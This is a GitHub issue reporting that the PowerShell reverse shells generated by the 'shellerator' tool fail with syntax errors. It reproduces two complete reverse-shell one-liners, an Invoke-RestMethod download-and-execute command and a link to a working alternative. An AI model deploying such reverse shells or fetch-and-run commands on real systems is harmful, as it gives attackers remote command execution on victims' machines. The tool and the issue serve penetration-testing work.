Open goreil opened 2 weeks ago
Both generated PowerShell reverse shells do not work:
I used the following command to generate the reverse shells:
```
# shellerator --type powershell --lport 443 --lhost 127.0.0.1
[1] powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("127.0.0.1",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
[2] powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

CLI command used:

```
/root/.local/bin/shellerator --reverse-shell --type powershell --lhost 127.0.0.1 --lport 443
```
Running them on a Windows host yields a lot of syntax errors:
```
> Invoke-RestMethod '127.0.0.1/rev1.ps1' | Invoke-Expression
At line:1 char:75
+ ... System.Net.Sockets.TCPClient('127.0.0.1',443); = .GetStream();[byte[ ...
+ ~
An expression was expected after '('.
At line:1 char:122
+ ... = .GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length ...
+ ~
Missing expression after ','.
At line:1 char:123
+ ... tream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0 ...
+ ~~~~~~~
Unexpected token '.Length' in expression or statement.
At line:1 char:122
+ ... = .GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length ...
+ ~
Missing closing ')' in expression.
At line:1 char:132
+ ... eam();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){ ...
+ ~
Missing statement body in while loop.
At line:1 char:138
+ ... byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (Ne ...
+ ~
Unexpected token ')' in expression or statement.
At line:1 char:203
+ ... = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = ...
+ ~
Missing ')' in method call.
At line:1 char:206
+ ... New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (i ...
+ ~
Missing expression after ',' in pipeline element.
At line:1 char:139
+ ... yte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (New ...
+ ~
Missing closing '}' in statement block or type definition.
At line:1 char:207
+ ... w-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (iex ...
+ ~
Unexpected token ')' in expression or statement.
Not all parse errors were reported. Correct the reported errors and try again.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ExpectedExpression
```
Fix: Use a working reverse shell like this one:
https://gist.githubusercontent.com/egre55/c058744a4240af6515eb32b2d33fbed3/raw/3ad91872713d60888dca95850c3f6e706231cb40/powershell_reverse_shell.ps1
Hello, thank you for raising the issue. However, I don't have the time to implement the fix. I'd be happy to review and merge a pull request 😉